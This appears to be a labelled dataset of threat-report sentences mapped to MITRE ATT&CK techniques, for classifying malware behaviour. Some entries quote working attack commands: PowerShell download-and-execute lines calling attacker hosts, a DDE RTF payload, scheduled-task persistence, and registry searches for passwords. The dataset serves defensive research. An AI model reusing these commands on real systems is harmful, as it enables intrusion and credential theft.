{"text1":"This differs from the previous OopsIE variant that used a hardcoded task name for the scheduled task","labels":"['T1053', 'T1053.005']"}
{"text1":"After creating this scheduled task for persistence, the Trojan will begin communicating with its C2 server","labels":"['T1053', 'T1053.005']"}
{"text1":"A scheduled task is also generated to maintain persistence of the payload","labels":"['T1053', 'T1053.005']"}
{"text1":"Office365DCOMCheck or SystemDiskClean) as the name for the scheduled task to maintain persistence on the victim host","labels":"['T1053', 'T1053.005']"}
{"text1":"The malware component, test.exe, uses the Windows command \"cmd.exe\" \/C whoami\u201d to verify it is running with the elevated privileges of \u201cSystem\u201d and creates persistence by creating the following scheduled task: \u00a0\u00a0\u00a0 schtasks \/create \/tn \"mysc\" \/tr C:\\Users\\Public\\test.exe \/sc ONLOGON \u00a0\u00a0\u00a0 \/ru \"System\" When executed, the malware first establishes a SOCKS5 connection to 192.157.198.103 using TCP port 1913","labels":"['T1053', 'T1053.005']"}
{"text1":"This DLL is used to create a scheduled task that points to the QuasarRAT binary, microsoft_network.exe, allowing it to remain persistent after reboot","labels":"['T1053', 'T1053.005']"}
{"text1":"They use At.exe to schedule tasks to run self-extracting RAR archives, which install either HttpBrowser or PlugX","labels":"['T1053', 'T1053.005']"}
{"text1":"Another batch script run by a scheduled task renames the archives on the file server (see Figure 15)","labels":"['T1053', 'T1053.005']"}
{"text1":"The scripts create scheduled tasks and also retrieve, decode, and execute a copy of Revenge RAT","labels":"['T1053', 'T1053.005']"}
{"text1":"The spreadsheet also creates a scheduled task named \"windows update check\" that runs the file C:\\Users\\<user_name>\\.templates\\System Manager.exe every minute.","labels":"['T1053', 'T1053.005']"}
{"text1":"When the trojan starts up it will attempt to install a scheduled task with the name of \u201cJava Maintenance64\u201d to keep itself running.","labels":"['T1053', 'T1053.005']"}
{"text1":"The campaigns maintain persistence on machines by creating two daily scheduled task entries.","labels":"['T1053', 'T1053.005']"}
{"text1":"The script writes files to the path % appdata %\\Roaming\\Microsoft\\Templates\\, then creates two task entries triggered to run daily.","labels":"['T1053', 'T1053.005']"}
{"text1":"On occasions, the phishing emails contained links to external domains to download the first stage, and sometimes the first stage was attached to the email itself","labels":"['T1598.003']"}
{"text1":"These emails included recruitment themed lures and contained links to malicious HTML application (.hta) files","labels":"['T1598.003']"}
{"text1":"The first link was labeled as \"Comparison of Major Tasks in '16 & '17\" and the second link was identified as \"Comparison between '16 & '17\".Upon opening these links the user was presented with a further decoy Hangul document","labels":"['T1598.003']"}
{"text1":"It is highly likely the adversary then used spear-phishing attacks containing links to these malicious documents as a delivery mechanism","labels":"['T1598.003']"}
{"text1":"email with an embedded tracking link","labels":"['T1598.003']"}
{"text1":"A total of 64MB of garbage data is appended to this copied file, likely as a way to deter any security products in place that may be scanning files on disk","labels":"['T1027.001']"}
{"text1":"Using this example, Comnie will then request data to supply to the BAT script, via the following decrypted request: h=HOSTNAME-PC&f=gethostinfo.bat&c=& Based on network traffic witnessed, the remote C2 server was found to respond with the following information:       netstat -ano > %TEMP%\\info.datipconfig \/all >> %TEMP%\\info.datroute PRINT >> %TEMP%\\info.datnet view >> %TEMP%\\info.dattasklist >> %TEMP%\\info.datnet user >> %TEMP%\\info.datnet start >> %TEMP%\\info.dat     \u00a0 This script is written to a temporary file prior to be executed","labels":"['T1007']"}
{"text1":"The final part of the VBA script changes the properties of these two files, setting their attributes to Hidden","labels":"['T1564.001']"}
{"text1":"The locations:  For root user  path: \/Library\/CoreMediaIO\/Plug-Ins\/FCP-DAL\/iOSScreenCapture.plugin\/Contents\/Resources\/ processname: screenassistantd  For regular user  path: ~\/Library\/Spelling\/ processname: spellagentd Subsequently, it implements the Loader::installLoader method, reading the hardcoded 64-bit Mach-O executable (magic value 0xFEEDFACF), and writing to the previously determined path and file","labels":"['T1564.001']"}
{"text1":"This field contains a URL that the Trojan will use to upload the contents of the <process ID of Trojan>.txt file, which will be structured as <process ID of Trojan>.<C2 domain> where the process ID is encoded with the same character substitution function as seen previously in Table 4","labels":"['T1057']"}
{"text1":"The most notable change to this variant of Zebrocy, other than the programming language used, is the way the tool gathers the system information and running processes","labels":"['T1057']"}
{"text1":"Gather domain and account names based on all running processes  Gathering account information from running processes","labels":"['T1057']"}
{"text1":"Figure 2: Process chain for the first part of the campaign Although the actual VBS script changed from sample to sample, with different levels of obfuscation and different ways of invoking the next stage of process tree, its final purpose remained same: invoking PowerShell to decode the Base64 encoded PowerShell command in the INI file that was dropped earlier by the macro, and executing it","labels":"['T1057']"}
{"text1":"It searches the active process list for the systemd process","labels":"['T1057']"}
{"text1":"Next, it checks the running processes against a list of hard-coded process names; if any are found, the machine is forcefully rebooted","labels":"['T1057']"}
{"text1":"This directory will also contain the process id of the running malware in process.id and a \u201cbuild name\u201d (as it is called by the author) in build.id","labels":"['T1057']"}
{"text1":"Enumerates running processes for \u201cWireshark\u201d and \u201cSysinternals\u201d","labels":"['T1057']"}
{"text1":"What does the Poseidon Group do? What happens after a target machine is infected? Once the target\u2019s machine is compromised, the attacker first enumerates all processes running in the system and all services","labels":"['T1057']"}
{"text1":"78 runin.bin List of processes names and associated plugins should be run inside these processes","labels":"['T1057']"}
{"text1":"The command does not attempt to kill the specific Office process that would load the particular delivery document, such as Excel in the case of this \u201c.xlam\u201d file, but instead attempts to kill processes associated with Word, Excel, PowerPoint and Publisher","labels":"['T1057']"}
{"text1":"While it includes multiple ways to find Explorer, the preferred method is to get the process id from the current desktop window.","labels":"['T1057']"}
{"text1":"As part of the anti-debugging or anti-monitoring techniques, ShellTea iterates over all the running processes, applies CRC32 on each process name (after converting the string to capital letters), and then compares the value against a predefined set of CRCs.","labels":"['T1057']"}
{"text1":"lists the running processes","labels":"['T1057']"}
{"text1":"The Trojan will then use the following regular expression to check the HTTP response to the content upload request for the file identifier value: \\\u201did\\\u201d:(.*) The Trojan will use this file identifier value to monitor for changes made to the file by the actor by checking for changes to the modification time of the <process ID of Trojan>.txt file","labels":"['T1070.006']"}
{"text1":"The Trojan uses the access token to write the string above to the first file uploaded to Google drive whose filename is <process ID of Trojan>.txt","labels":"['T1134']"}
{"text1":"The tokens for each platform are hardcoded within the sample:November 2016 to January 2017: \"Evil New Year\" CampaignIn the early part of 2017, Group123 started the \"Evil New Year\" campaign","labels":"['T1134']"}
{"text1":"Figure\u00a06 Relational diagram of artifacts\u00a0 We created a timeline of the activity based off the data we collected, and found that the attack dates were tightly clustered into two waves in mid- to late-October and in mid-November as we see in Figure 7 using the timestamps from Table 3","labels":"['T1562.001']"}
{"text1":"Ability to disable Microsoft Office Protected View (as shown in Figure 15) by setting the following keys in the Windows Registry: DisableAttachmentsInPV DisableInternetFilesInPV DisableUnsafeLocationsInPV       Figure 15: Disabling Microsoft Office Protected View  Ability to remotely reboot or shut down or clean the system based on the command received from the C2 server, as shown in Figure 16","labels":"['T1562.001']"}
{"text1":"From an infrastructure point of view there is no overlap between the two sets of activity, the only overlap is the use of the unique tool \u201cDNSMessenger\u201d  When these points are considered together in conjunction with the significant difference in targeting they make a strong case for classifying this activity as distinct from FIN7 activity","labels":"['T1562.001']"}
{"text1":"SHA256 Compiled C2 account POP3S Account SMTPS Accounts   861b6bc1f9.","labels":"['T1087']"}
{"text1":"Restricting these privileges may prevent malware from running or limit its capability to spread through the network.Carefully consider the risks before granting administrative rights to users on their own machines.Scrub and verify all administrator accounts regularly.Configure Group Policy to restrict all users to only one login session, where possible.Enforce secure network authentication, where possible.Instruct administrators to use non-privileged accounts for standard functions such as web browsing or checking webmail.Segment networks into logical enclaves and restrict host-to-host communication paths","labels":"['T1087']"}
{"text1":"This may include information about the currently logged in user, the hostname, network configuration data, active connections, process information, local and domain administrator accounts, an enumeration of user directories, and other data","labels":"['T1087']"}
{"text1":"With these outputs, FIN6 was able to identify user accounts that could access additional hosts in the domain","labels":"['T1087']"}
{"text1":"The PowerShell script collects all possible information on the user and the network, including snapshots, computer and user names, emails from registry, tasks in task scheduler, system information, AVs registered in the system, privileges, domain and workgroup information","labels":"['T1087']"}
{"text1":"Its use of a PowerShell payload means that only legitimate system processes are utilized and that the malicious code execution can only be identified through enhanced logging or in memory","labels":"['T1546.013', 'T1059.001']"}
{"text1":"Mandiant initially identified an early variant of the POSHSPY backdoor deployed as PowerShell scripts during an incident response engagement in 2015","labels":"['T1546.013', 'T1059.001']"}
{"text1":"Figure 2: WindowsParentalControlsMigration CommandLineTemplate Figure 3 contains the decoded PowerShell command from the \u201cCommandLineTemplate.\u201d      Figure 3: Decoded CommandLineTemplate PowerShell code POSHSPY PowerShell Component The full code for a POSHSPY sample is available here","labels":"['T1546.013', 'T1059.001']"}
{"text1":"Additional Reading This PowerShell logging blog post contains more information on improving PowerShell visibility in your environment","labels":"['T1546.013', 'T1059.001']"}
{"text1":"However, in this new variant, all the DNS activity is initiated and executed solely from memory \u2013 unlike previous attacks which used PowerShell commands","labels":"['T1546.013', 'T1059.001']"}
{"text1":"The PowerShell script executes a compressed first stage PowerShell child process, which then performs a second stage PowerShell process","labels":"['T1546.013', 'T1059.001']"}
{"text1":"The PowerShell implant used in the Olympics campaign was a stager based on the PowerShell Empire framework that created an encrypted channel to the attacker\u2019s server","labels":"['T1546.013', 'T1059.001']"}
{"text1":"(For more on steganography, see the McAfee Labs Threats Report, June 2017, page 33.) The implants covered in this research establish a permanent presence on the victim\u2019s system once the PowerShell implant is executed","labels":"['T1546.013', 'T1059.001']"}
{"text1":"The main function performed by the SCT file is to Base64 decode the contents of WindowsDefender.ini file and execute the decoded PowerShell Script using the following command line: powershell.exe -exec Bypass -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\\\ProgramData\\\\WindowsDefender.ini) The rest of the malicious activities are performed by the PowerShell Script","labels":"['T1546.013', 'T1059.001']"}
{"text1":"PowerShell File Analysis The PowerShell script employs several layers of obfuscation to hide its actual functionality","labels":"['T1546.013', 'T1059.001']"}
{"text1":"Figure 11: PowerShell script is XOR encoded using a single byte key After deobfuscating the contents of the PowerShell Script, we can divide it into three sections","labels":"['T1546.013', 'T1059.001']"}
{"text1":"The malicious macros were all designed to use Windows PowerShell to download a shellcode-based payload from a remote server","labels":"['T1546.013', 'T1059.001']"}
{"text1":"The macro uses PowerShell to download a shellcode-based payload from a remote server using one of two available techniques","labels":"['T1546.013', 'T1059.001']"}
{"text1":"On January 1, 2017, we observed this URL responding to the above HTTP request with the following data:powershell.exe -exec bypass -window hidden -noni -nop -encoded JABjAG8AbQBtAGEAbgBkACAAPQAgACcAVwB3AEIATwBBAEcAVQBBAGQAQQBBAHUAQQBGAE0AQQBaAFEAQgB5AEEASABZAEEAYQBRAEIAagBBAEcAVQBBAFUAQQBCAHYAQQBHAGsAQQBiAGcAQgAwAEEARQAwAEEAWQBRAEIAdQBBAEcARQBBAFoAdwBCAGwAQQBIAEkAQQBYAFEAQQA2AEEARABvAEEAVQB3AEIAbABBAEgASQBBAGQAZwBCAGwAQQBIAEkAQQBRAHcAQgBsAEEASABJAEEAZABBAEIAcABBAEcAWQBBAGEAUQBCAGoAQQBHAEUAQQBkAEEAQgBsAEEARgBZAEEAWQBRAEIAcwBBAEcAawBBAFoAQQBCAGgAQQBIAF..snip..As you can see, the C2 server responds with a PowerShell command that will run on the system","labels":"['T1546.013', 'T1059.001']"}
{"text1":"Upon execution in a vulnerable environment, the PowerShell based payload takes over","labels":"['T1546.013', 'T1059.001']"}
{"text1":"The PowerShell script is responsible for downloading the final payload from C2 server to execute it","labels":"['T1546.013', 'T1059.001']"}
{"text1":"Use of the non-public PowerShell backdoor previously described by Morphisec and MalwareBytes (which we refer to as POWERSTATS)","labels":"['T1546.013', 'T1059.001']"}
{"text1":"Attacker deception and attribution The deobfuscated PowerShell code used by the MuddyWater group resembles previously seen PowerShell scripts that most likely served as prototypes","labels":"['T1546.013', 'T1059.001']"}
{"text1":"Lock PowerShell Execution Policy, must be set to \u201cAllSigned\u201d via GPO","labels":"['T1546.013', 'T1059.001']"}
{"text1":"These PowerShell scripts are final stage payloads \u2013 they include a downloader with domain generation algorithm (DGA) functionality and the backdoor component, which connect to the C2 server to receive commands and perform additional malicious activities.\u00a0 hUpdateCheckers.ps1 (POWRUNER) The backdoor component, POWRUNER, is a PowerShell script that sends and receives commands to and from the C2 server","labels":"['T1546.013', 'T1059.001']"}
{"text1":"The contents within the releasenotes.txt file (SHA256: bf925f340920111b385078f3785f486fff1096fd0847b993892ff1ee3580fa9d) \u00a0contains the following formula that Excel will save to the \u201cA0\u201d cell in the worksheet:  The formula uses a command prompt to run a PowerShell script that attempts to download and execute a second PowerShell script hosted at the URL hxxp:\/\/micrrosoft[.]net\/winupdate.ps1","labels":"['T1546.013', 'T1059.001']"}
{"text1":"The decompressed PowerShell payload has some similarities to the PowerShell Empire agent, such as the use of a jitter value and commands referred to by job ID, but we do not have conclusive evidence that the author of this tool used Empire as a basis for their tool","labels":"['T1546.013', 'T1059.001']"}
{"text1":"It will run the newly downloaded PowerShell script by running the following command via cmd \/c:       wscript.exe \"Office365DCOMCheck.vbs\" \"PowerShell.exe-ExecutionPolicy bypass -WindowStyle hidden -NoProfile <path to Office365DCOMCheck.ps1 script>\"     The payload will then notify the C2 it has successfully downloaded and executed the secondary PowerShell payload","labels":"['T1546.013', 'T1059.001']"}
{"text1":"The Information Gathering Tool (IGT) tool is coded in Delphi and includes powershell and SQL components across a dozen different drops","labels":"['T1546.013', 'T1059.001']"}
{"text1":"The following shows this unused command, which exposed an additional server within Sofacy\u2019s infrastructure would download and execute an encoded PowerShell script from 92.114.92[.]102:       C:\\\\Programs\\\\Microsoft\\\\MSOffice\\\\Word.exe\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -sta -NonI -Whidden $e=(New-ObjectSystem.Net.webClient).downloadString('hxxp:\/\/92.114.92[.]102:80\/d');powershell -enc $e #     The unused command above appears to be related to previous attacks, specifically attacks that occurred in November 2017 as discussed by McAfee and ESET","labels":"['T1546.013', 'T1059.001']"}
{"text1":"Then, it will launch Dec.exe using PowerShell with the command \u201c cmd.exe \/c powershell - WindowStyle Hidden Start-Process Dec.exe - WindowStyle maximized \u201d.","labels":"['T1546.013', 'T1059.001']"}
{"text1":"The attacker made use of Cobalt Strike\u2019s \u201cpsexec\u201d lateral movement command to create a Windows service named with a random 16-character string on the target system and execute encoded PowerShell","labels":"['T1546.013', 'T1059.001']"}
{"text1":"Next, the script triggered a PowerShell stager","labels":"['T1546.013', 'T1059.001']"}
{"text1":"Following successful infiltration, the malware persists through registry: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run The command line execution leads to PowerShell code executed from a different registry value .","labels":"['T1546.013', 'T1059.001']"}
{"text1":"PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Waterbug C& Cs.","labels":"['T1546.013', 'T1059.001']"}
{"text1":"The script is used to decode and execute the following payloads:Appach01.jpg (renamed: Windows-KB275122-x86.exe) is a Freenki sample.Appach01.jpg (renamed: Windows-KB271854-x86.exe) is a PoohMilk sample.PoohMilk AnalysisThe PoohMilk sample is designed to perform two actions:Create persistence to execute the Freenki sample at the next reboot.Check specific files on the infected machine.The first action is to create a registry key in order to execute the Windows-KB275122-x86.exe file previously downloaded","labels":"['T1106']"}
{"text1":"Additionally we see a cmd.exe process launched and used for process injection using the VirtualAlloc(), WriteProcessMemory() and CreateRemoteThread() Windows APIs, as with the first finding of ROKRAT they continue to use similar Windows APIs","labels":"['T1055.012']"}
{"text1":"It hands over the decrypted buffer extracted from the resource section and the path from the original RegAsm executable to the start_protect_hexcode function.Then it starts the process-hollowing shellcode, which is stored in the HEXCODE1 variable","labels":"['T1055.012']"}
{"text1":"Then, they are using the process hollowing technique to hide the execution of these tools inside of the original Microsoft vbc.exe (VisualBasic Compiler) process","labels":"['T1055.012']"}
{"text1":"Figure 6 Example of delivery document The RTF document (8cf3bc2bf\u2026) was very small in size at 264 bytes, which can be seen in its entirety here:       {\\rtf1{\\field{\\*\\fldinst DDEAUTO \"C:\\\\\\\\WIndowS\\\\\\\\SYsTem32\\\\\\\\cMD.eXe \" \"\/C\tPOWErsHELl.eXE\u00a0\u00a0-ex\u00a0\u00a0\u00a0\u00a0 BypaSs\u00a0\u00a0-NOP\t-w\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0HIdDen\u00a0\u00a0(NEw-oBjeCT SyStEm.NET.weBCLiENT).dowNloADFILe( 'hxxp:\/\/86.106.131[.]177\/link\/GRAPH.EXE'\u00a0\u00a0,\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 '%apPDAtA%\\graph.exe'\u00a0\u00a0 )\u00a0\u00a0 ;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 saps\u00a0\u00a0\u00a0\u00a0'%Appdata%\\graph.exe'\"}}}     The contents above use the DDE functionality in Microsoft Word to run a PowerShell script to download the Koadic payload from a remote server, save it as an executable file on the system and then execute the payload","labels":"['T1055.012']"}
{"text1":"Figure 1 Article referenced by decoy document in attack against British government agency \u00a0 The attached document leverages a DDE exploit to ultimately execute the following code:c:\\\\windows\\\\system32\\\\cmd.exe \"\/k PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noprofile -command (New-Object System.Net.WebClient).DownloadFile('https:\/\/881.000webhostapp[.]com\/0_31.doc', '%TEMP%\\\\AAA.exe');Start-Process('%TEMP%\\\\AAA.exe')Palo Alto Networks first witnessed this DDE exploit technique in May 2017, and attackers continue to leverage it","labels":"['T1055.012']"}
{"text1":"Upon execution, this Trojan checks to see if it was configured with \u201cBINDERON\u201d to determine if it should extract an embedded payload from a resource named \u201cB\u201d, save it to %TEMP%\\%BIND1%, and create a new process with the embedded payload","labels":"['T1055.012']"}
{"text1":"Figure 15: Structure used to send data to server    Figure 16: Structure used to send data to C2 server The structure is converted to Base64 using the CryptBinaryToStringA function","labels":"['T1048']"}
{"text1":"It then uses WebDAV to upload to a Box cloud drive.","labels":"['T1048']"}
{"text1":"Much like the previous version of Reaver, Reaver.v3 will query the necessary registry keys to determine the correct startup path to use","labels":"['T1012']"}
{"text1":"An example of this decompressed configuration may be seen below:  Figure 2 Decompressed Reaver configuration This configuration contains multiple pieces of information, including the following:  Network port Sleep timer between network requests Remote Command and Control (C2) Service Name Service Description Service Display Name Hardcoded String","labels":"['T1569.002']"}
{"text1":"Much like the original payload, this tool uses if\/else statements to skip the legitimate code in the Saransh Email System source to run the malicious functions, which have the same method names as the original tool and follow the same call sequence:  Form1.Speed Form1.diomadnfagaghagh Form1.fjcsERIfjfiojsGHIsdifjksi Form1.gsgjIDJIGJIGJIGJIFDOSpl Form1.FJaioefgkaoeK  This chain of functions eventually loads a resource named \u2018GSrdofjksrgj\u2019, which the tool decrypts using the same algorithm and key as in the initial payload:byte[] array4 = new byte[] {     19,     129,     43,     37,     56,     65,     255,     75,     111,     19,     211,     120,     0,     49,     126,     248 };The decrypted payload has a SHA256 hash of 5e805a88294f6d25d55103d19d13e798e01ad70e6b89e9c58db5d468cc63b3d5, which is a variant of the NanoCore remote administration tool","labels":"['T1569.002']"}
{"text1":"The files we recovered indicate they do it by executing a script file, which uses the Sysinternals  psexec tool to move laterally by trying to copy it to every machine they can reach:","labels":"['T1569.002']"}
{"text1":"The following capabilities have been observed in this payload:  Get drive information Modify files Modify directories Modify registry Spawn process Terminate process Modify services Kill self   Ties to SunOrcal Reaver was used concurrently with SunOrcal over the past year, to include two Reaver samples dropped from zip files hosted on a domain also being used as a SunOrcal C2 (www.fyoutside[.]com), and there is also passive DNS overlap amongst the C2s","labels":"['T1112']"}
{"text1":"The backdoor will modify the registry for the Windows Media Player to store its C&C configuration.","labels":"['T1112']"}
{"text1":"Hard Disk Check The Trojan will perform the following WMI query: \u00a0 Select * from Win32_DiskDrive \u00a0 The Trojan will check the Caption and Model fields in the results for the strings Virtual, VMWare, VM, VBox or Oracle","labels":"['T1497.001', 'T1497']"}
{"text1":"Motherboard Check The Trojan will perform the following WMI query: \u00a0 Select * from Win32_BaseBoard \u00a0 The Trojan will check the Manufacturer and Product fields in the results for the strings VMware, Virtual, VBox, VM or Oracle","labels":"['T1497.001', 'T1497']"}
{"text1":"ShellTea utilizes a number of techniques to identify if it is running within a virtual environment or is being monitored.","labels":"['T1497.001', 'T1497']"}
{"text1":"High resolution screenshots of specified process windows and when recording VoiceIP application audio","labels":"['T1123']"}
{"text1":"To ensure its victim will use IE, it will terminate any process in-focus that is Chrome or Firefox, in hopes the victim will believe the browsers are \u201cmalfunctioning.\u201d Whenever a victim uses IE and browses to specific Brazilian banks or businesses, the malware will only then begin to log keystrokes","labels":"['T1552.001']"}
{"text1":"The usage of LinkedIn to deliver malicious documents,","labels":"['T1566.003']"}
{"text1":"At the same time, Enc.exe will start the encryption routine and append \u201c. jcry \u201d as file extension to the encrypted file.","labels":"['T1486']"}
{"text1":"Opening document starts a template injection technique for loading the document template from the internet.","labels":"['T1221']"}
{"text1":"The Data field is encrypted using a custom stream cipher.","labels":"['T1486']"}
{"text1":"Finally the script deletes the shadow copies, in a preparation for the ransomware operations.","labels":"['T1490']"}
{"text1":"They apparently create a Domain Admin account  named SQLSVC and give it the password Br4pbr4p (which also happens to be the password salt preconfigured in the dirtycow exploit script) and then leverage that account to perform a series of commands.","labels":"['T1136']"}
{"text1":"smb and exploit in same sentence","labels":"['T1210']"}
{"text1":"The decoy file, doc.rtf, contains an OLE object that uses Equation Editor to drop the embedded shellcode in %TEMP%","labels":"['T1559.002']"}
{"text1":"The decrypted shellcode is dropped as a Microsoft Word plugin WLL  into C:\\Users\\ADMINI~1\\AppData\\Roaming\\Microsoft\\Word\\STARTUP.","labels":"['T1137']"}
{"text1":"The wormDll32 module attempts to identify servers and domain controllers in the network using NetServerEnum and LDAP queries.","labels":"['T1482']"}
{"text1":"This module searches the infected system\u2019s files to gather email addresses for information-stealing purposes.","labels":"['T1114']"}
{"text1":"A USB data collecting tool that checks for a connected USB drive and steals certain file types, encrypting them into a RAR file.","labels":"['T1025']"}
{"text1":"overwrite or delete MBR in same sentence","labels":"['T1561.002']"}
{"text1":"master boot record wiper","labels":"['T1561.002']"}
{"text1":"MBR + overwrite\/wipe","labels":"['T1561.002']"}
{"text1":"reg query HKLM \/f password \/t REG_SZ \/s","labels":"['T1552.002']"}
{"text1":"reg query HKCU \/f password \/t REG_SZ \/s","labels":"['T1552.002']"}
{"text1":"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager","labels":"['T1546.009']"}
{"text1":"COM and execution in same sentence","labels":"['T1021.003']"}
{"text1":"C:\\Windows\\System32\\sethc.exe","labels":"['T1546.008']"}
{"text1":"collect + keychain in same sentence","labels":"['T1555.001']"}
{"text1":"looks for net and account or domain in close proximity","labels":"['T1201']"}
{"text1":"!ProcessList List running processes, including their PID, parent PID, executable name and priority   !SendFileToServer Uploads a specified file to the C2 server   !CaptureScreen Takes a screenshot that it saves to a file and uploads to the C2 server","labels":"['T1057', 'T1105']"}
{"text1":"(Source: Dell SecureWorks) Appendix C \u2014 OwaAuth web shell analysis OwaAuth is a web shell that is installed as an ISAPI filter on Exchange servers and shares characteristics with the ChinaChopper web shell","labels":"['T1059', 'T1505.003']"}
{"text1":"(Source: Dell SecureWorks)  ChinaChopper web shell \u2014 A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system","labels":"['T1059', 'T1505.003']"}
{"text1":"(Source: Dell SecureWorks) Table 4 lists the OwaAuth web shell commands available to the adversary","labels":"['T1059', 'T1505.003']"}
{"text1":"(Source: Dell SecureWorks)   The following tools appear to be exclusive to TG-3390:  OwaAuth web shell \u2014 A web shell and credential stealer deployed to Microsoft Exchange servers","labels":"['T1059', 'T1505.003']"}
{"text1":"(Source: SecureWorks)  NetWire logs keystrokes and peripheral inputs into encoded files in the C:\\Users\\<username>   Figure 3","labels":"['T1033', 'T1056']"}
{"text1":"(Source: SecureWorks)  The \u201cWindows Folder.exe\u201d executable spawns and injects code into the legitimate notepad.exe Windows process (see Figure 2)","labels":"['T1055.012', 'T1055']"}
{"text1":"0x007CFABF  video  Desktop video recording    0x06E533C4  download  Downloads executable and injects into new process    0x00684509  ammyy  Ammyy Admin tool    0x07C6A8A5  update  Updates self    0x0B22A5A7  \u00a0  Add\/Update klgconfig (analysis incomplete)    0x0B77F949  httpproxy  Starts HTTP proxy    0x07203363  killos  Renders computer unbootable by wiping the MBR    0x078B9664  reboot  Reboots the operating system    0x07BC54BC  tunnel  Creates a network tunnel    0x07B40571  adminka  Adds new C2 server or proxy address for pseudo-HTTP protocol    0x079C9CC2  server  Adds new C2 server for custom binary protocol    0x0007C9C2  user  Creates or deletes Windows user account    0x000078B0  rdp  Enables concurrent RDP (analysis incomplete)    0x079BAC85  secure  Adds Notification Package (analysis incomplete)    0x00006ABC  del  Deletes file or service    0x0A89AF94  startcmd  Adds command to the configuration file (see the Configuration section)    0x079C53BD  runmem  Downloads executable and injects directly into new process    0x0F4C3903  logonpasswords  Send Windows accounts details to the C2 server    0x0BC205E4  screenshot  Takes a screenshot of the desktop and sends it to the C2 server    0x007A2BC0  sleep  Backdoor sleeps until specified date    0x0006BC6C  dupl  Unknown    0x04ACAFC3  \u00a0  Upload files to the C2 server    0x00007D43  vnc  Runs VNC plugin    0x09C4D055  runfile  Runs specified executable file    0x02032914  killbot  Uninstalls backdoor    0x08069613  listprocess  Returns list of running processes to the C2 server    0x073BE023  plugins  Change C2 protocol used by plugins    0x0B0603B4  \u00a0  Download and execute shellcode from specified address    0x0B079F93  killprocess  Terminates the first process found specified by name    0x00006A34  cmd  Initiates a reverse shell to the C2 server    0x09C573C7  runplug  Plugin control    0x08CB69DE  autorun  Updates backdoor    Table 2: Supported Commands Configuration A configuration file resides in a file under the backdoor\u2019s installation directory with the .bin extension","labels":"['T1041', 'T1105', 'T1008']"}
{"text1":"13 14 ams_api64.dll ams_api32.dll Handy wrapper around API of exXX.dll, pdXX.dll, sgXX.dll","labels":"['T1055', 'T1574.001', 'T1574.002']"}
{"text1":"2.\u00a0\u00a0\u00a0\u00a0 The macro decodes the dropped files using Windows certutil.exe (certutil.exe is a legitimate built-in command-line program to manage certificates in Windows).    3.\u00a0\u00a0\u00a0\u00a0 The macro creates a copy of the files with their proper extensions using Extensible Storage Engine Utilities (esentutil.exe) (esentutil.exe is also a legitimate program that is pre-installed in Windows). The dropped files include the following:  GUP.exe\u00a0:\u00a0GUP, a free (LGPL) Generic Updater.\u00a0GUP is an open source binary used by Notepad++ for software updates","labels":"['T1055.012', 'T1106', 'T1036', 'T1010']"}
{"text1":"22 Keylogging and exfiltrating data The exfiltrated data is base64 that decodes into more custom encoded strings that appear to be \u201c\/\u201d delimited","labels":"['T1140', 'T1560']"}
{"text1":"37 38 zlib64.dll zlib32.dll Open source \u201czlib\u201d version 1.2.3 used by libpngXX.dll for compressing screenshots (ssXX.dll)","labels":"['T1055', 'T1574.002']"}
{"text1":"59 60 61 62 freeimage_32.dll freeimageplus_32.dll freeimage_64.dll freeimageplus_64.dll FreeImage open source library supports popular graphics image formats (ver 3.15.4 2012-10-27) (http:\/\/freeimage.sourceforge.net)","labels":"['T1055', 'T1574.001']"}
{"text1":"68271df868f462c06e24a896a9494225,Office Monkeys LOL Video.zip Believe it or not, recipients in bulk run the file within: 95b3ec0a4e539efaa1faa3d4e25d51de,Office Monkeys (Short Flash Movie).exe This file in turn drops two executables to %temp%: 2aabd78ef11926d7b562fd0d91e68ad3, Monkeys.exe 3d3363598f87c78826c859077606e514, player.exe It first launches Monkeys.exe, playing a self-contained, very funny video of white-collar tie wearing chimpanzees working in a high rise office with a human colleague","labels":"['T1036', 'T1125']"}
{"text1":"Additional Features The Zyklon malware offers the following additional capabilities (via plugins): Browser Password Recovery Zyklon HTTP can recover passwords from popular web browsers, including:  Google Chrome Mozilla Firefox Internet Explorer Opera Browser Chrome Canary\/SXS CoolNovo Browser Apple Safari Flock Browser SeaMonkey Browser SRWare Iron Browser Comodo Dragon Browser  FTP Password Recovery Zyklon currently supports FTP password recovery from the following FTP applications:  FileZilla SmartFTP FlashFXP FTPCommander Dreamweaver WS_FTP  Gaming Software Key Recovery Zyklon can recover PC Gaming software keys from the following games:  Battlefield Call of Duty FIFA NFS Age of Empires Quake The Sims Half-Life IGI Star Wars  Email Password Recovery Zyklon may also collect email passwords from following applications:  Microsoft Outlook Express Microsoft Outlook 2002\/XP\/2003\/2007\/2010\/2013 Mozilla Thunderbird Windows Live Mail 2012 IncrediMail, Foxmail v6.x - v7.x Windows Live Messenger MSN Messenger Google Talk GMail Notifier PaltalkScene IM Pidgin (Formerly Gaim) Messenger Miranda Messenger Windows Credential Manager  License Key Recovery The malware automatically detects and decrypts the license\/serial keys of more than 200 popular pieces of software, including Office, SQL Server, Adobe, and Nero","labels":"['T1003', 'T1552.001']"}
{"text1":"Additional mitigations that could help to prevent attacks like these from succeeding in your environment include:  Changing the default handler for \u201c.hta\u201d files in your environment so that they cannot be directly executed.hta\u201d files in your environment so that they cannot be directly executed","labels":"['T1070.004', 'T1105']"}
{"text1":"After decrypting and decompressing the strings, we can trivially identify aspects of the PlugX configuration","labels":"['T1140', 'T1027']"}
{"text1":"Afterwards, the persistence file will be created in \/Library\/LaunchDaemons\/ or ~\/Library\/LaunchAgents\/ \u00a0folder","labels":"['T1564.001', 'T1543.001']"}
{"text1":"After we decrypted the additional shellcode, we determined that the functional shellcode is part of the Metasploit Framework, specifically using the block_api.asm code to resolve API function names and the block_reverse_http.asm code to obtain additional shellcode to execute on the system","labels":"['T1140', 'T1105']"}
{"text1":"All of the backdoors identified - excluding RoyalDNS - required APT15 to create batch scripts in order to install its persistence mechanism","labels":"['T1064', 'T1547.001']"}
